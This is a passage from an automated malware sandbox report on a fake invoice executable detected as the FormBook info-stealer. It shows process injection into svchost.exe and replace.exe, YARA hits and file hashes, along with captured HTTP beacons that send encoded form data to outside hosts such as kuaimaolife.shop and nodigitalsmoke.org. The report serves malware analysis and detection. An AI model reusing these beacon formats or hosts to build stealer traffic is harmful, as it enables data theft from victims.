7a 4a 45 55 48 6f 57 6d 6d 50 36 6b 4d 6a 58 45 59 34 7a 6d 54 79 2f 79 51 4f 6f 32 47 6e 4d 66 38 65 41 72 69 35 4d 55 4e 49 44 6d 5a 6b 45 59 6a 4b 6a 4d 72 56 50 66 76 63 33 4a 61 32 6a 42 59 68 47 74 2f 34 30 55 6a 6c 73 4f 79 42 5a 68 4a 39 4d 42 39 63 59 56 6a 59 44 75 49 32 6d 6a 75 62 66 4a 55 58 79 Data Ascii: jz=Mxd/3qPWYHfxXUxQNXmcQJZQW9ns0w0DqFtDlVAvvKIfQCZtKRkrMAhbT/H63w0j6DGmfljifiuhzEuRFRROhXdzamPVQeG1AJmfbLa086pt/wPQnaQ9XzJEUHoWmmP6kMjXEY4zmTy/yQOo2GnMf8eAri5MUNIDmZkEYjKjMrVPfvc3Ja2jBYhGt/40UjlsOyBZhJ9MB9cYVjYDuI2mjubfJUXy
Sep 27, 2024 09:08:48.682331085 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 27 Sep 2024 07:08:48 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49723	38.55.251.233	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:08:50.363095999 CEST	1703	OUT	POST /j39u/ HTTP/1.1 Host: www.kuaimaolife.shop Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.kuaimaolife.shop Referer: http://www.kuaimaolife.shop/j39u/ Connection: close Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 6a 7a 3d 4d 78 64 2f 33 71 50 57 59 48 66 78 58 55 78 51 4e 58 6d 63 51 4a 5a 51 57 39 6e 73 30 77 30 44 71 46 74 44 6c 56 41 76 76 4d 51 66 51 33 4e 74 4b 79 4d 72 50 41 68 62 61 66 48 37 33 77 30 45 36 44 4f 71 66 6c 2b 5a 66 67 6d 68 78 69 61 52 4e 46 46 4f 30 48 64 7a 59 6d 50 55 4e 75 48 68 41 4e 4b 44 62 4c 4b 30 38 36 70 74 2f 32 7a 51 67 4c 51 39 56 7a 4a 48 44 33 6f 67 69 6d 50 65 6b 4e 47 73 45 62 55 6a 6d 6a 53 2f 79 77 65 6f 6d 6c 50 4d 58 38 65 47 71 69 34 4a 55 4e 55 51 6d 5a 6f 6d 59 6a 75 4a 4d 73 68 50 66 6f 31 68 4e 71 32 56 59 6f 68 6e 2f 76 70 53 4b 6c 78 64 41 69 35 44 74 4c 35 59 4a 50 63 47 56 45 63 6a 71 70 62 4b 2f 6f 72 6b 48 52 72 36 35 6a 74 57 69 46 30 6d 5a 4e 4c 54 73 62 49 48 42 7a 62 62 32 45 5a 50 31 4d 64 77 63 6a 35 52 67 78 58 6d 75 70 32 72 34 49 63 53 6a 62 35 33 46 32 68 42 46 67 31 31 77 4c 67 49 50 6c 4f 72 6b 6f 30 77 4a 6b 79 32 76 78 48 75 70 4c 6d 30 43 73 61 41 69 55 43 4a 66 75 44 61 37 35 6e 6f 77 77 35 54 47 49 53 4f 6c 59 6b 45 6b 34 67 59 75 57 42 [TRUNCATED] Data Ascii: jz=Mxd/3qPWYHfxXUxQNXmcQJZQW9ns0w0DqFtDlVAvvMQfQ3NtKyMrPAhbafH73w0E6DOqfl+ZfgmhxiaRNFFO0HdzYmPUNuHhANKDbLK086pt/2zQgLQ9VzJHD3ogimPekNGsEbUjmjS/yweomlPMX8eGqi4JUNUQmZomYjuJMshPfo1hNq2VYohn/vpSKlxdAi5DtL5YJPcGVEcjqpbK/orkHRr65jtWiF0mZNLTsbIHBzbb2EZP1Mdwcj5RgxXmup2r4IcSjb53F2hBFg11wLgIPlOrko0wJky2vxHupLm0CsaAiUCJfuDa75noww5TGISOlYkEk4gYuWBQ3dx8w9fIxOQ3kAniNU+N5YmYiIJfnwbCez+aHEwU1EZvlIACh2yYwI9PDBcWbg4Dq6pp0f9UIz9jzfURSwY42zmRy2eLs1RcH39iecZeFGisupEEd2ZUe9LCG32HvzEATASDprC087N43q2AZNmtoShaFaramdPWPk6HYoGhX0fHw2VWSZOvcFSCMA2Ln+q0jLh7zkba191p1KarxcZscPy4aQ6Xg991jyFl1UDjl2GCQk/X+nRLeW84hTGwcKi36XXEziYnck/tQIkWWwAZSuiSjHVPBstv++aMHZX2R7H8qtONLhgSXsLsZ6FtlfbzsXVoPye3LKtUx7u70SHOFz76WC6ctrRTqbE2KJtBeQ8iEjQgkfnduAk5jsjC09Lwbsd1tJmiGvJ0w0EGkcxD8J2/lkkTUVoyTsAyC4r0rPsz+JwahPqTq/2xj1nCG0BU9rEnEPrpCta3ZENZImPZ64X6vBENMPfGzvvbO4qpiw4jmv/p7liDuogZ0IizuRuwkNJoL5pm7z8GqiJ8PJDMy58K5DTw7CsVsxASjBy1TImUYfedcnb+3GaVx+AWra6XbzpciAOyCgJojz1keqglTslLwGtUEuuLxtjdXfK2dqaqtwAIVqXfpmpUHAB2YDb9KQOgS26xz9SXCV8nn9i4XU9DbU144xSZj [TRUNCATED]
Sep 27, 2024 09:08:51.235686064 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 27 Sep 2024 07:08:51 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49724	38.55.251.233	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:08:52.939517021 CEST	406	OUT	GET /j39u/?jz=Bz1f0c7bYWyPEXgQH2KhVZZ8APOK/AslnFtnj2cpqvgmCRIzB1oQIQo/LvP87UgGwTfaSD+LVTW+9AK3Nxg5qUhvSHaGZLmYP9ngab3X35l8/z/r5KgCJlFWcHojvmaM7w==&npb=3FKhBrgHxb5d5XX HTTP/1.1 Host: www.kuaimaolife.shop Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Sep 27, 2024 09:08:53.830423117 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 27 Sep 2024 07:08:53 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49725	3.33.130.190	80	3628	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:08:58.990962982 CEST	672	OUT	POST /pnbu/ HTTP/1.1 Host: www.nodigitalsmoke.org Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.nodigitalsmoke.org Referer: http://www.nodigitalsmoke.org/pnbu/ Connection: close Content-Length: 203 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 6a 7a 3d 43 4f 41 4d 76 6f 43 37 2f 4b 67 6b 41 56 45 33 4e 38 4a 74 6a 51 48 68 68 68 77 73 6e 73 6e 74 63 4d 69 52 68 4b 4b 63 39 67 56 64 35 36 65 4d 4b 37 63 66 55 35 6d 69 72 35 63 6d 36 67 45 58 65 73 58 2f 31 6a 58 68 59 57 49 4e 4c 77 79 6c 77 75 4e 69 62 43 46 57 5a 68 56 4d 56 32 52 4c 64 44 49 56 30 5a 6f 38 4e 56 32 59 6c 2f 35 48 61 59 42 4a 67 43 4a 32 63 64 34 6f 51 42 4a 42 49 35 77 59 69 74 42 76 72 71 64 37 57 4d 50 4e 6d 6f 75 4c 57 48 67 4a 46 64 6e 47 4a 4d 68 75 2f 59 68 77 47 47 67 75 4e 54 62 78 53 79 5a 4f 2f 76 5a 64 32 35 61 45 38 63 4a 54 46 2f 6a 48 74 46 4e 71 59 56 34 3d Data Ascii: jz=COAMvoC7/KgkAVE3N8JtjQHhhhwsnsntcMiRhKKc9gVd56eMK7cfU5mir5cm6gEXesX/1jXhYWINLwylwuNibCFWZhVMV2RLdDIV0Zo8NV2Yl/5HaYBJgCJ2cd4oQBJBI5wYitBvrqd7WMPNmouLWHgJFdnGJMhu/YhwGGguNTbxSyZO/vZd25aE8cJTF/jHtFNqYV4=

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.5	49726	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 09:09:01.904606104 CEST	692	OUT	POST /pnbu/ HTTP/1.1 Host: www.nodigitalsmoke.org Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.nodigitalsmoke.org Referer: http://www.nodigitalsmoke.org/pnbu/ Connection: close Content-Length: 223 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 6a 7a 3d 43 4f 41 4d 76 6f 43 37 2f 4b 67 6b 61 30 30 33 65 64 4a 74 68 77 48 69 75 42 77 73 6f 4d 6e 70 63 4d 2b 52 68 50 72 42 38 54 78 64 35 59 47 4d 4e 36 63 66 52 35 6d 69 73 4a 63 70 6b 51 45 41 65 74 72 4a 31 68 7a 68 59 57 4d 4e 4c 78 43 6c 7a 59 46 68 62 53 46 59 4d 78 56 30 4c 47 52 4c 64 44 49 56 30 59 4d 57 4e 56 2b 59 6b 4f 4a 48 4c 4b 35 49 2f 79 4a 35 64 64 34 6f 48 52 49 4b 49 35 77 2b 69 73 64 4a 72 76 5a 37 57 4a 4c 4e 6e 35 75 4d 66 48 67 50 49 39 6d 74 49 70 59 42 31 5a 78 6e 4f 6e 38 6f 57 6c 62 65 54 45 30 6b 6c 4e 52 31 6c 5a 32 38 73 50 42 6b 55 50 43 75 33 6d 64 61 47 43 74 75 42 6f 34 69 77 57 61 38 39 48 35 51 58 51 46 68 39 4e 5a 39 Data Ascii: jz=COAMvoC7/Kgka003edJthwHiuBwsoMnpcM+RhPrB8Txd5YGMN6cfR5misJcpkQEAetrJ1hzhYWMNLxClzYFhbSFYMxV0LGRLdDIV0YMWNV+YkOJHLK5I/yJ5dd4oHRIKI5w+isdJrvZ7WJLNn5uMfHgPI9mtIpYB1ZxnOn8oWlbeTE0klNR1lZ28sPBkUPCu3mdaGCtuBo4iwWa89H5QXQFh9NZ9

Target ID:	0
Start time:	03:06:53
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\Revised Invoice H000127896.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Revised Invoice H000127896.exe"
Imagebase:	0x400000
File size:	1'379'361 bytes
MD5 hash:	2A489CAB1A6113A0F082D8BFEE40EAD9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	03:06:57
Start date:	27/09/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Revised Invoice H000127896.exe"
Imagebase:	0x220000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2536793601.0000000008050000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2532355748.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2532985374.0000000004FE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	03:07:35
Start date:	27/09/2024
Path:	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe"
Imagebase:	0x800000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3292716261.0000000003D00000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	5
Start time:	03:07:36
Start date:	27/09/2024
Path:	C:\Windows\SysWOW64\replace.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\replace.exe"
Imagebase:	0xf0000
File size:	18'944 bytes
MD5 hash:	A7F2E9DD9DE1396B1250F413DA2F6C08
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3291336208.0000000002120000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3292632667.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3292694436.0000000002820000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Target ID:	7
Start time:	03:07:50
Start date:	27/09/2024
Path:	C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe"
Imagebase:	0x800000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3292411346.0000000001220000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	8
Start time:	03:08:02
Start date:	27/09/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true